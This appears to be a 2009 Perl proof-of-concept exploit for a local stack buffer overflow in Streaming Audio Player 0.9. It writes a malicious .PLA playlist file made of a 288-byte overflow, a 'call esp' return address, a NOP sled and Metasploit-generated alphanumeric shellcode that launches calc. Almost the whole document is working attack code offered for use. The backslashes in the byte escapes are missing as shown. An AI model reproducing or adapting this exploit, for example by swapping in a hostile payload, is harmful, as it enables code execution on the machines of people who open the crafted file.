# by : Hakxer -> EgY Coders Team
# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit
# hakxer.1@gmail.com
# Greetz : Allah
#                , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends
##########################################################################
 
$buff="x41" x 288;
$ret="x77xE9xAEx59"; # 0x77E9AE59      call esp
$nops="x90" x 20;
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x30x42x50x4bx48x45x44x4ex43x4bx48x4ex37".
"x45x50x4ax47x41x50x4fx4ex4bx48x4fx44x4ax31x4bx38".
"x4fx55x42x32x41x50x4bx4ex49x44x4bx58x46x43x4bx48".
"x41x30x50x4ex41x53x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x45x46x42x46x50x45x37x45x4ex4bx38".
"x4fx55x46x52x41x30x4bx4ex48x56x4bx38x4ex30x4bx34".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex41x4bx58".
"x41x50x4bx4ex49x48x4ex55x46x32x46x50x43x4cx41x43".
"x42x4cx46x46x4bx58x42x54x42x53x45x38x42x4cx4ax37".
"x4ex50x4bx38x42x44x4ex50x4bx58x42x47x4ex31x4dx4a".
"x4bx58x4ax56x4ax30x4bx4ex49x50x4bx48x42x58x42x4b".
"x42x50x42x30x42x50x4bx38x4ax46x4ex43x4fx55x41x53".
"x48x4fx42x36x48x35x49x38x4ax4fx43x48x42x4cx4bx47".
"x42x35x4ax36x42x4fx4cx48x46x50x4fx55x4ax56x4ax39".
"x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x36x41x56".
"x4ex36x43x56x42x50x5a";
open(MYFILE,'>>exploit.pla');
print MYFILE $buff;
print MYFILE $ret;
print MYFILE $nops;
print MYFILE $shellcode;
close(MYFILE);

# www.Syue.com [2009-05-07]